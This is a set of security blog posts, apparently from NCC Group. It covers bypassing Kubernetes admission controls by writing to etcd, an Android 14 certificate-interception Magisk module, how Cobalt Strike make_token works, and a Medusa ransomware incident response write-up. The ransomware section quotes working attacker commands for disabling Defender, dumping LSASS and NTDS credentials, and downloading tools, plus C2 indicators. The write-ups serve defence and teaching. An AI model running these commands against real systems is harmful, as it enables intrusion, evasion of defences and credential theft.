There is a built-in validation type Admission Controller that enforces the deployment of hardened pods, known as the Pod Security Admission (PSA). This Admission Controller supports three predefined levels of security, known as the Pod Security Standard, which are detailed in the official Kubernetes documentation. In summary, they are as follows:

  • Privileged: No restrictions. This policy would allow you to have all permissions to perform a pod breakout.
  • Baseline: This policy applies a minimum set of hardening rules, such as restricting the use of host-shared namespaces, using AppArmor, or allowing only a subset of capabilities.
  • Restricted: This is the most restrictive policy and applies almost all available hardening options.

PSAs replace the obsolete Pod Security Policies (PSP) and are applied at the namespace level, so all pods deployed in a namespace where these policies are defined are subject to the configured pod security standard.

It is worth noting that these PSAs apply equally to all roles, so even a cluster admin cannot circumvent these restrictions unless they recreate the namespace with these policies disabled:

root@kind-control-plane:/# kubectl get ns restricted-ns -o yaml
apiVersion: v1
kind: Namespace
metadata:
  creationTimestamp: "2023-05-23T10:20:22Z"
  labels:
    kubernetes.io/metadata.name: restricted-ns
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/warn: restricted
  name: restricted-ns
  resourceVersion: "3710"
  uid: 2277ebac-e487-4d59-8a09-97bef27cc0d9
spec:
  finalizers:
  - kubernetes
status:
  phase: Active

root@kind-control-plane:/# kubectl run nginx --image nginx -n restricted-ns
Error from server (Forbidden): pods "nginx" is forbidden: violates PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "nginx" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "nginx" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "nginx" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "nginx" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")

As expected, not even a cluster administrator is allowed to deploy a pod without meeting all the security requirements imposed by the PSA. However, it is possible to inject privileged pods into namespaces restricted by PSAs using etcd:

root@kind-control-plane:/# kubetcd create pod nginx_privileged -t nginx -n restricted-ns -P
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Privileged SecurityContext Added
Path injected: /registry/pods/restricted-ns/nginx_privileged
OK
root@kind-control-plane:/# kubectl get pods -n restricted-ns
NAME               READY   STATUS    RESTARTS   AGE
nginx_privileged   1/1     Running   0          23y
root@kind-control-plane:/# kubectl get pod nginx_privileged -n restricted-ns -o yaml | grep "restricted\\|privileged:"
    namespace: restricted-ns
        privileged: true

With the ability to deploy unrestricted privileged pods, it would be easy to get a shell on the underlying node. This demonstrates that gaining write access to an etcd node, whether deployed as a pod within the cluster, as a local service in the control plane or as an isolated node as part of an etcd cluster, could compromise the Kubernetes cluster and all its underlying infrastructure.
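The "Tampering data" step shown in the kubetcd output above boils down to editing the deserialized manifest before writing it back to etcd. A rough Python illustration of that kind of mutation (an assumed sketch of the general approach, not kubetcd's actual code; real etcd values are protobuf, not plain dicts):

```python
# Illustrative mutation: add a privileged securityContext to every
# container of a deserialized pod manifest before re-serializing it.
# (Assumed workflow for demonstration purposes only.)

def add_privileged_context(pod: dict) -> dict:
    for container in pod["spec"]["containers"]:
        container["securityContext"] = {"privileged": True}
    return pod

pod = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "nginx_privileged", "namespace": "restricted-ns"},
    "spec": {"containers": [{"name": "nginx", "image": "nginx"}]},
}
pod = add_privileged_context(pod)
print(pod["spec"]["containers"][0]["securityContext"])  # {'privileged': True}
```

Because the mutated value is written straight into etcd, no admission controller ever inspects this securityContext.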

Why does this work?

When working with the regular client, kubectl, it sends all requests directly to the kube-apiserver, where processes are executed in the following order: authentication, authorisation and Admission Controllers. Once the request has been authenticated, authorised and filtered through the admission controllers, the kube-apiserver redirects the request to the other components of the cluster to organise the provisioning of the desired resource. In other words, the kube-apiserver is not only the entry point to the cluster, but also applies all the controls for accessing it.

However, by injecting these resources directly into etcd, we bypass all of these controls, because the request never passes from the client through the kube-apiserver: the objects are written straight into the backend database where the cluster elements are stored. As the current architecture of Kubernetes is designed, it places trust in etcd, assuming that if an element is already in the database, it has already passed all the controls imposed by the kube-apiserver.

Mitigating the threat

Despite the capabilities of this post-exploitation technique, it would be easy to detect, especially if we seek to obtain shells on the nodes, mainly by third-party runtime security solutions with good log-ingestion times, such as Falco, or by EDRs running at the node level.

However, as already demonstrated, gaining access to the nodes would be a simple task, and since most container engines run as root by default with the user namespace disabled, we would get a direct root shell in most cases. This would allow us to manipulate host services and processes, be they EDRs or log-forwarding agents. Enabling the user namespace, using container sandboxing technologies or running the container engine in rootless mode could help mitigate this attack vector.

Conclusions

The state-of-the-art regarding the attack surface in a Kubernetes cluster has been defined for some time, focusing on elements such as unauthenticated kube-apiserver or kubelet services, leaked tokens or credentials, and various pod breakout techniques. Most of the techniques described so far in relation to etcd have focused primarily on the extraction of secrets and the lack of encryption of data at rest.

This paper aims to demonstrate that a compromised etcd is the most critical element within the cluster, as it is not subject to role restrictions or Admission Controllers. This makes it easy to compromise not only the cluster itself, but also its underlying infrastructure, including all the nodes on which a kubelet is deployed.

This should make us rethink the implementation of etcd and its reliability within the cluster by implementing additional mechanisms that ensure data integrity.

Tool Release: Magisk Module – Conscrypt Trust User Certs

8 November 2023 at 14:31

Overview

Android 14 introduced a new feature that allows CA certificates to be installed remotely. With this change, instead of using the /system/etc/security/cacerts directory to check trusted CAs, Android reads the certificates from the com.android.conscrypt APEX module, in the directory /apex/com.android.conscrypt/cacerts.

Inspired by this blog post by Tim Perry, I decided to create a Magisk module to automate the work required to intercept traffic on Android 14 with tooling such as Burp Suite, using the installed user certificates in a similar fashion to the MagiskTrustUserCerts module.

This Magisk module makes all installed user CAs part of the Conscrypt APEX module’s CA certificates, so that they are automatically trusted when building the trust chain on Android 14.

The Magisk module is available for download from https://github.com/nccgroup/ConscryptTrustUserCerts

Note: It should be noted that if an application has implemented SSL Pinning, it would not be possible to intercept the HTTPS traffic.

APEX: A quick overview

The Android Pony EXpress (APEX) container format was introduced in Android 10 and it is used in the install flow for lower-level system modules. This format facilitates the updates of system components that do not fit into the standard Android application model. Some example components are native services and libraries, hardware abstraction layers (HALs), runtime (ART), and class libraries.

With the introduction of APEX, system libraries in Android can be updated individually like Android apps. The main benefit of this is that system components can be individually updated via the Android Package Manager instead of having to wait for a full system update.

Source: https://source.android.com/docs/core/ota/apex

What is Conscrypt?

The Conscrypt module (com.android.conscrypt) is distributed as an APEX file and is used as a Java Security Provider. On Android 14, an updatable root trust store was introduced within Conscrypt. This allows for faster CA updates, making it possible to revoke trust in problematic or failing CAs across all Android 14 devices.

Source: https://source.android.com/docs/core/ota/modular-system/conscrypt

Creating the Magisk module

The script that appears on Tim Perry’s blog post was used as the template for the module, but some modifications were required in order to use it as a Magisk module.

In Magisk, boot scripts can run in two different modes: post-fs-data and late_start service mode. Since the Zygote process needed to be running, the boot script was set to run in late_start service mode.

To ensure that the boot process had completed before mounting our CA certificates over the Conscrypt directory inside Zygote’s mount namespace, the system property sys.boot_completed was checked, as it is set to 1 once the whole boot process has finished.

The following piece of code was added at the beginning of the script:

while [ "$(getprop sys.boot_completed)" != 1 ]; do
    /system/bin/sleep 1s
done

The script was also modified to use the user-installed CAs with the following code:

cp /data/misc/user/0/cacerts-added/* /data/local/tmp/tmp-ca-copy/

With these modifications in place, we had a functional Magisk module to intercept HTTPS traffic on Android 14.

Thanks to

Daniel Romero for his support throughout the research process.

Demystifying Cobalt Strike’s “make_token” Command

Introduction

If you are a pentester and enjoy tinkering with Windows, you have probably come across the following post by Raphael Mudge:

In this post, he explains how the Windows program runas works and how the netonly flag allows the creation of processes where the local identity differs from the network identity (the local identity remains the same, while the network identity is represented by the credentials used by runas).

Cobalt Strike provides the make_token command to achieve a similar result to runas /netonly.

If you are familiar with this command, you have likely experienced situations in which processes created by Beacon do not “inherit” the new token properly. The inner workings of this command are fairly obscure, and searching Google for something like “make_token cobalt strike” does not provide much valuable information (in fact, it is far more useful to analyse the implementations of other frameworks such as Sliver or Covenant).

Figure 2 - make_token documentation

In Raphael Mudge’s video Advanced Threat Tactics (6 of 9): Lateral Movement we can get more details about the command with statements like:

“If you are in a privileged context, you can use make_token in Beacon to create an access token with credentials”

“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”

Even though the description does not mention it, Raphael states that make_token requires an administrative context. However, if we go ahead and use the command with a non-privileged user… it works! What are we missing here?

Figure 3 - make_token from an unprivileged session

This post aims to shed more light on how the make_token command works, as well as its capabilities and limitations. This information will be useful in situations where you want to impersonate other users through their credentials with the goal of enumerating or moving laterally to remote systems.

It’s important to note that, even though we are discussing Cobalt Strike, this knowledge is perfectly applicable to any modern C2 framework. In fact, for the purposes of this post, we took advantage of the fact that Meterpreter did not have a make_token module to implement it ourselves.

An example of the new post/windows/manage/make_token module can be seen below:

Figure 4 - Meterpreter make_token module

You can find more information about our implementation in the following links:

Windows Authentication Theory

Let’s begin with some theory about Windows authentication. This will help in understanding how make_token works under the hood and addressing the questions raised in the introduction.

Local Security Context = Network Security Context?

Let’s consider a scenario where our user is capsule.corp\yamcha and we want to interact with a remote system to which only capsule.corp\bulma has access. In this example, we have Bulma’s password, but the account is affected by a deny logon policy in our current system.

If we attempt to run a cmd.exe process with runas using Bulma’s credentials, the result will be something like this:

Figure 5 - runas fails due to deny log on policy

The netonly flag is intended for these scenarios. With this flag we can create a process where we remain Yamcha at the local level, while we become Bulma at the network level, allowing us to interact with the remote system.

Figure 6 - runas netonly works

In this example, Yamcha and Bulma were users from the same domain, and we could circumvent the deny log on policy by using the netonly flag. This flag is also very handy for situations where you have credentials belonging to a local user from a remote system, or to a domain user from an untrusted domain. 

The fundamental thing to understand here is that Windows will not validate the credentials you specify to runas /netonly; it will just make sure they are used when the process interacts with the network. That’s why we can bypass deny log on policies with runas /netonly, and also use credentials belonging to users outside our current system or from untrusted domains.   

Now… How does runas manage to create a process where we are one identity in the local system, and another identity in the network?

If we extract the strings of the program, we will see the presence of CreateProcessWithLogonW.

$ strings runas.exe | grep -i createprocess
CreateProcessAsUserW
CreateProcessWithLogonW

A simple lookup of the function shows that runas is probably using it to create a new process with the credentials specified as arguments.

Figure 7 - CreateProcessWithLogonW

Reading the documentation, we will find a LOGON_NETCREDENTIALS_ONLY flag which allows the creation of processes in a similar way to what we saw with netonly. We can safely assume that this flag is the one used by runas when we specify /netonly.

Figure 8 - Netonly flag

The Win32 API provides another function very similar to CreateProcessWithLogonW, but without the process creation logic. This function is called LogonUserA.

Figure 9 - LogonUserA

LogonUserA is solely responsible for creating a new security context from given credentials. This is the function that make_token leverages and is commonly used along with the LOGON32_LOGON_NEW_CREDENTIALS logon type to create a netonly security context (we can see this in the implementations of open source C2 frameworks).

Figure 10 - Netonly flag
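As a rough illustration of the calls described above, a netonly token can be requested from Python via ctypes on Windows. This is a sketch, not a drop-in implementation: error handling and handle cleanup are minimal, and the helper name is ours. The constants match the values documented for winbase.h.

```python
# Sketch: create a netonly access token with LogonUserW and apply it to
# the current thread with ImpersonateLoggedOnUser (Windows-only).
import ctypes
from ctypes import wintypes

LOGON32_LOGON_NEW_CREDENTIALS = 9   # netonly: credentials used only on the network
LOGON32_PROVIDER_WINNT50 = 3        # required provider for LOGON_NEW_CREDENTIALS

def make_netonly_token(user: str, domain: str, password: str) -> wintypes.HANDLE:
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    token = wintypes.HANDLE()
    ok = advapi32.LogonUserW(
        user, domain, password,
        LOGON32_LOGON_NEW_CREDENTIALS,
        LOGON32_PROVIDER_WINNT50,
        ctypes.byref(token),
    )
    if not ok:
        raise ctypes.WinError(ctypes.get_last_error())
    # Apply the new security context to the current thread only:
    # the local identity is unchanged, the network identity becomes user/domain.
    if not advapi32.ImpersonateLoggedOnUser(token):
        raise ctypes.WinError(ctypes.get_last_error())
    return token
```

Note that with LOGON32_LOGON_NEW_CREDENTIALS the credentials are not validated at this point: LogonUserW succeeds even for made-up accounts, which is exactly the behaviour discussed later in this post.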

To understand how it is possible to create a process with two distinct “identities” (local/network), it is fundamental to become familiar with two important components of Windows authentication: logon sessions and access tokens.

Logon Sessions and Access Tokens

When a user authenticates to a Windows system, a process similar to the image below occurs. At a high level, the user’s credentials are validated by the appropriate authentication package, typically Kerberos or NTLM. A new logon session is then created with a unique identifier, and the identifier along with information about the user is sent to the Local Security Authority (LSA) component. Finally, LSA uses this information to create an access token for the user.

Figure 11 - Windows authentication flow

Regarding access tokens, they are objects that represent the local security context of an account and are always associated with a process or thread of the system. These objects contain information about the user such as their security identifier, privileges, or the groups to which they belong. Windows performs access control decisions based on the information provided by access tokens and the rules configured in the discretionary access control list (DACL) of target objects.

An example is shown below where two processes – one from Attl4s and one from Wint3r – attempt to read the “passwords.txt” file. As can be seen, the Attl4s process is able to read the file due to the second rule (Attl4s is a member of Administrators), while the Wint3r process is denied access because of the first rule (Wint3r has identifier 1004).

Figure 12 - Windows access controls

Regarding logon sessions, their importance stems from the fact that if an authentication results in cached credentials, they will be associated with a logon session. The purpose of cached credentials is to enable Windows to provide a single sign-on (SSO) experience where the user does not need to re-enter their credentials when accessing a remote service, such as a shared folder on the network.

As an interesting note, when Mimikatz dumps credentials from Windows authentication packages (e.g., sekurlsa::logonpasswords), it iterates through all the logon sessions in the system to extract their information.

The following image illustrates the relationship between processes, tokens, logon sessions, and cached credentials:

Figure 13 - Relationship between processes, threads, tokens, logon sessions and cached credentials

The key takeaways are:

  • Access tokens represent the local security context of an authenticated user. The information in these objects is used by the local system to make access control decisions
  • Logon sessions with cached credentials represent the network security context of an authenticated user. These credentials are automatically and transparently used by Windows when the user wants to access remote services that support Windows authentication

What runas /netonly and make_token do under the hood is create an access token similar to that of the current user (Yamcha), along with a logon session containing the credentials of the alternate user (Bulma). This enables the dual-identity behaviour where the local identity remains the same, while the network identity changes to that of the alternate user.

Figure 14 - Yamcha access token linked to logon session with Bulma credentials

As stated before, the fact that runas /netonly and make_token do not validate credentials has many benefits. For example, we can use credentials for users who have been denied local access, and also for accounts that the local system does not know and cannot validate (e.g. a local user from another computer or an account from an untrusted domain). Additionally, we can create “sacrificial” logon sessions with invalid credentials, which allows us to manipulate Kerberos tickets without overwriting the ones stored in the original logon session. 

However, this lack of validation can also result in unpleasant surprises, for example in the case of a company using an authenticated proxy. If we make a mistake when inserting credentials to make_token, or create sacrificial sessions carelessly, we can end up with locked accounts or losing our Beacon because it is no longer able to exit through the proxy!

Administrative Context or Not!?

Raphael mentioned that, in order to use a token created by make_token, an administrative context was needed.

“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”

Do we really need an administrative context? The truth is there are situations where this statement is not entirely accurate.

As far as we know, the make_token command uses the LogonUserA function (along with the LOGON32_LOGON_NEW_CREDENTIALS flag) to create a new access token similar to that of the user, but linked to a new logon session containing the alternate user’s credentials. The command does not stop there though, as LogonUserA only returns a handle to the new token; we have to do something with that token!

Let’s suppose our goal is to create new processes with the context of the new token.

Creating Processes with a Token

If we review the Windows API, we will spot two functions that support a token handle as an argument to create a new process:

Reading the documentation of these functions, however, will show the following statements:

“Typically, the process that calls the CreateProcessAsUser function must have the SE_INCREASE_QUOTA_NAME privilege and may require the SE_ASSIGNPRIMARYTOKEN_NAME privilege if the token is not assignable.”

“The process that calls CreateProcessWithTokenW must have the SE_IMPERSONATE_NAME privilege.”

This is where Raphael’s statement makes sense. Even if we can create a token with a non-privileged user through LogonUserA, we will not be able to use that token to create new processes. To do so, Microsoft indicates we need administrative privileges such as SE_ASSIGNPRIMARYTOKEN_NAME, SE_INCREASE_QUOTA_NAME or SE_IMPERSONATE_NAME.

When using make_token in a non-privileged context and attempting to create a process (e.g., shell dir \dc01.capsule.corp\C$), Beacon will silently fail and fall back to ignoring the token to create the process. That’s one of the reasons why sometimes it appears that the impersonation is not working properly.

As a note, agents like Meterpreter do give more information about the failure:

Figure 15 - Impersonation failed

As such, we could rephrase Raphael’s statement as follows:

“The problem with make_token is it requires you to be in an administrator context before you can actually create processes with that token”

The perceptive reader may now wonder… What happens if I operate within my current process instead of creating new ones? Do I still need administrative privileges?

Access Tokens + Thread Impersonation

The Windows API provides functions like ImpersonateLoggedOnUser or SetThreadToken to allow a thread within a process to impersonate the security context provided by an access token.

Figure 16 - ImpersonateLoggedOnUser

In addition to keeping the token handle for future process creations, make_token also employs functions like these to acquire the token’s security context in the thread where Beacon is running. Do we need administrative privileges for this? Not at all.

As can be seen in the image below, we meet point number three:

Figure 17 - When is impersonation allowed in Windows

This means that any command or tool executed from the thread where Beacon is running will benefit from the security context created by make_token, without requiring an administrative context. This includes many of the native commands, as well as capabilities implemented as Beacon Object Files (BOFs).

Figure 18_01 - Beacon capabilities benefiting from the security context of the token
Figure 18_02 - Beacon capabilities benefiting from the security context of the token

Closing Thoughts

Considering all the information above, we could do a more detailed description of make_token as follows:

The make_token command creates an access token similar to the one of the current user, along with a logon session containing the credentials specified as arguments. This enables a dual identity where nothing changes locally (we remain the same user), but in the network we will be represented by the credentials of the alternate user (note that make_token does not validate the credentials specified). Once the token is created, Beacon impersonates it to benefit from the new security context when running inline capabilities.

The token handle is also stored by Beacon to be used in new process creations, which requires an administrative context. If a process creation is attempted with an unprivileged user, Beacon will ignore the token and fall back to a regular process creation.

As a final note, we would like to point out that in 2019 Raphael Mudge released a new version of his awesome Red Team Ops with Cobalt Strike course. In the eighth video, make_token was once again discussed, but this time showing a demo with an unprivileged user. While this demonstrated that running the command did not require an administrative context, it did not explain much more about it.

We hope this article has answered any questions you may have had about make_token.

Sources

Don’t throw a hissy fit; defend against Medusa

13 November 2023 at 14:01

Unveiling the Dark Side: A Deep Dive into Active Ransomware Families 

Author: Molly Dewis 

Intro 

Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.   

In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into Medusa. 

Not to be confused with MedusaLocker, Medusa was first observed in 2021 and is a Ransomware-as-a-Service (RaaS) that often uses the double extortion method for monetary gain. In 2023 the group’s activity increased with the launch of the ‘Medusa Blog’, a platform that serves as a tool for leaking data belonging to victims. 

Summary 

This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.  

Below provides a summary of findings which are presented in this blog post: 

  • Use of web shells to maintain access. 
  • Utilising PowerShell to conduct malicious activity. 
  • Dumping password hashes.  
  • Disabling antivirus services.  
  • Use of Windows utilities for discovery activities.  
  • Reverse tunnel for C2. 
  • Data exfiltration.  
  • Deployment of Medusa ransomware. 

Medusa  

Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of double-extortion ransomware, where the threat actor exfiltrates and encrypts data, then threatens to release or sell the victim’s data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware can be characterised as financially motivated. Victims of Medusa ransomware come from no particular industry, suggesting the group behind this variant has no issue with harming any organisation.  

Incident Overview 

Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.  

Timeline 

T – Initial Access gained via web shells.  

T+13 days – Execution activity. 

T+16 days – Persistence activity. 

T+164 days – Defense Evasion activity. 

T+172 days – Persistence and Discovery activity. 

T+237 days – Defense Evasion and Credential Access Activity started. 

T+271 days – Ransomware Executed.  

Mitre TTPs 

Initial Access 

The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.  

Execution 

PowerShell was leveraged by the threat actor to conduct various malicious activity such as:   

  • Downloading executables  
    • Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc … 
  • Disabling Microsoft Defender 
    • Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; 
  • Deleting executables 
    • Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe 
  • Conducting discovery activity  
    • Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain 
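For triage, the `-enc` payloads seen in commands like those above are simply Base64 over the UTF-16LE bytes of the command text. A small Python helper (ours, for analysis; not an artefact from the engagement) round-trips one:

```python
# PowerShell's -EncodedCommand expects Base64 of the UTF-16LE command text.
# Encoding/decoding it is useful when triaging logged command lines.
import base64

def encode_ps(command: str) -> str:
    """Encode a command the way PowerShell -enc expects it."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_ps(blob: str) -> str:
    """Recover the cleartext command from a logged -enc argument."""
    return base64.b64decode(blob).decode("utf-16-le")

blob = encode_ps("net group 'domain admins' /domain")
print(blob)
print(decode_ps(blob))  # net group 'domain admins' /domain
```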

Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> /user:<DOMAIN\\USER> /password:<REDACTED> process call create ‘cmd.exe’. 

Scheduled tasks were used to execute c:\\programdata\\a.bat. It is not known exactly what a.bat was used for, however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi.  

  • powershell Invoke-WebRequest -Uri hxxp://download.anydesk[.]com/AnyDesk.msi -OutFile anydesk.msi 
  • msiExec.exe /i anydesk.msi /qn 

A cmd.exe process was started with the following argument list: c:\\programdata\\a.bat’;start-sleep 15;ps AnyDeskMSI 

Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.   

Persistence 

Maintaining access to the victim’s network was achieved by creating a new user admin on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless; however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>. 

Defence Evasion 

Evading detection was one of the aims for this threat actor due to the various defence evasion techniques utilised. Antivirus agents were removed from all affected hosts including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;.  

Additionally, LAdHW.sys, a signed kernel-mode driver, was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command & {Remove-NetFirewallRule -DisplayName \”<Antivirus Agent Firewall Rule Name>\”} 

The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted many of these executables such as JAVA64.exe and re.exe were deleted after use. Additionally, Sophos.exe (see below) which was packed with Themida, was executed.  

Figure 1 – Sophos.exe. 

The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities. 

Credential Access 

The following credential dumping techniques were utilised by the threat actor:  

  • Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.  
  • Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable. 
  • An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll. 
    • powershell -exec bypass -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full” 
  • The built-in Windows tool ntdsutil.exe was used to extract the NTDS database:  
    • powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q 

Discovery 

The threat actor conducted the following discovery activity: 

Type of discovery activity Description 
nltest /trusted_domains Enumerates domain trusts 
net group 'domain admins' /domain Enumerates domain groups 
net group 'domain computers' /domain Enumerates domain computers 
ipconfig /all Displays network configuration and settings 
tasklist Displays a list of currently running processes on a computer 
quser Shows currently logged-on users 
whoami Establishes which user the threat actor was running as 
wmic os get name Gathers the name of the operating system 
wmic os get osarchitecture Establishes the operating system architecture 
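Individually these binaries are benign; a burst of several distinct ones from a single host in a short window is the stronger signal. A simple illustrative scoring sketch (names and threshold are ours) over process-creation event names:

```python
# Built-in tools seen in the discovery activity above.
DISCOVERY_COMMANDS = {"nltest", "net", "ipconfig", "tasklist",
                      "quser", "whoami", "wmic"}

def discovery_score(process_names) -> int:
    """Count distinct discovery tools in a burst of process-creation
    events (names lower-cased, trailing .exe stripped). Requires 3.9+."""
    seen = {p.lower().removesuffix(".exe") for p in process_names}
    return len(seen & DISCOVERY_COMMANDS)

burst = ["whoami.exe", "ipconfig.exe", "tasklist.exe", "net.exe", "quser.exe"]
print(discovery_score(burst))  # 5
```

A threshold of, say, three or more distinct tools within a few minutes would be a reasonable starting point for an alert, tuned to the environment.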

Lateral Movement 

Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network. 

Command and Control 

A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic which can be seen in this case, as port 80 was used. 

Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.  

Exfiltration 

Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.  

Impact 

The Medusa ransomware, in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.  

Indicators of Compromise 

IOC Value Indicator Type Description  
webhook[.]site Domain Malicious webhook 
bashupload[.]com Domain Download JAVA64.exe and RW.exe 
tmpfiles[.]org Domain Download re.exe 
134.195.88[.]27:80 IP:PORT C2 
8e8db098c4feb81d196b8a7bf87bb8175ad389ada34112052fedce572bf96fd6 SHA256 trust.exe (Mimikatz.exe) 
3e7529764b9ac38177f4ad1257b9cd56bc3d2708d6f04d74ea5052f6c12167f2 SHA256 JAVA_V01.exe  
f6ddd6350741c49acee0f7b87bff7d3da231832cb79ae7a1c7aa7f1bc473ac30 SHA256 testy.exe / gmer_th.exe  
63187dac3ad7f565aaeb172172ed383dd08e14a814357d696133c7824dcc4594 SHA256 JAVA_V02.exe  
781cf944dc71955096cc8103cc678c56b2547a4fe763f9833a848b89bf8443c6  SHA256 Sophos.exe 
C:\Users\Sophos.exe File Path Sophos.exe 
C:\Users\admin\Desktop\ File Path trust.exe, JAVA_V01.exe, testy.exe, gmer_th.exe, JAVA_V02.exe 
C:\ProgramData\JWrapper-Remote Access\ File Path JWrapper files 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH> File Path GhostWebshell compiled files 
C:\Windows\PSEXESVC.exe File Path PsExec 
C:\Users\<USERS>\AppData\Local\Temp\LAdHW.sys File Path Disables AV 
C:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe File Path PDQDeployRunner – used to deploy LAdHW.sys 
C:\Users\<USER>\AppData\Local\Temp\2\gaze.exe C:\Windows\System32\gaze.exe File Path Ransomware executable 
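The SHA256 values above can be swept for across hosts by hashing candidate files and comparing against the IOC set. A minimal sketch (only two of the table’s hashes are shown; the helper names are illustrative):

```python
import hashlib

# Two of the SHA256 IOCs from the table above.
IOC_HASHES = {
    "8e8db098c4feb81d196b8a7bf87bb8175ad389ada34112052fedce572bf96fd6",  # trust.exe
    "781cf944dc71955096cc8103cc678c56b2547a4fe763f9833a848b89bf8443c6",  # Sophos.exe
}

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so large binaries are not read into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def is_known_ioc(path: str) -> bool:
    return sha256_of(path) in IOC_HASHES
```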

MITRE ATT&CK® 

Tactic Technique ID Description  
Initial Access Exploit Public-Facing Application T1190 A vulnerable application hosted on an external-facing web server was exploited.  
Execution  Windows Management Instrumentation T1047 WMI used to remotely execute a cmd.exe process.  
Execution  Scheduled Task/Job: Scheduled Task T1053.005 A scheduled task was created to execute a.bat. 
Execution  Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was leveraged to execute malicious commands.  
Execution  Software Deployment Tools T1072 PDQ Deploy was installed to deploy LAdHW.sys. 
Execution System Services: Service Execution T1569.002 PsExec was installed as a service.  
Persistence Create Account: Domain Account T1136.002 A new user ‘admin’ was created to maintain access.  
Persistence Server Software Component: Web Shell T1505.003 Web shells were utilised to maintain access.  
Defense Evasion Obfuscated Files or Information: Software Packing T1027.002 Sophos.exe was packed with Themida. 
Defense Evasion  Indicator Removal: File Deletion T1070.004 Malicious executables were deleted after use.   
Defense Evasion Indicator Removal: Clear Persistence T1070.009 Malicious executables were deleted after use.   
Defense Evasion Obfuscated Files or Information T1027 Base64 encoded PowerShell commands were utilised to download malicious executables.  
Defense Evasion  Modify Registry T1112 The WDigest registry key was modified to enable credential dumping activity. 
Defense Evasion Impair Defenses: Disable or Modify Tools T1562.001 Antivirus services were disabled.  
Defense Evasion Impair Defenses: Disable or Modify System Firewall T1562.004 Firewall rules were deleted.  
